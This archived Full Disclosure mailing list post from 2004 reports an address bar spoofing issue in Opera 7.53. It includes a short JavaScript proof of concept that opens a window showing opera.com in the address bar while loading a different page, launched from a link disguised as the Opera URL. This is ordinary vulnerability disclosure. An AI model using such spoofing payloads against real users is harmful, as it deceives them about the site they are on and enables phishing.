Full Disclosure mailing list archives

Opera 7.53 (Build 3850) Address Bar Spoofing Issue


From: "bitlance winter" <bitlance_3 () hotmail com>
Date: Mon, 26 Jul 2004 13:02:11 +0000

Hello List.

I report you about
Opera 7.53 (Build 3850) Address Bar Spoofing Issue,
tested on Windows OS.

==== begin of PoC
[script]
function fake() {
 oc=window.open('http://www.opera.com/&apos;, '','location=1');
 oc.location.replace('http://www.example.com&apos;);
}
[/script]
[a href="javascript:void(0);"
onClick="fake()"]http://www.opera.com/[/a]
==== end of PoC

Best Regards.

--
bilance winter

_________________________________________________________________
MSN Toolbar provides one-click access to Hotmail from any Web page – FREE download! http://toolbar.msn.click-url.com/go/onm00200413ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: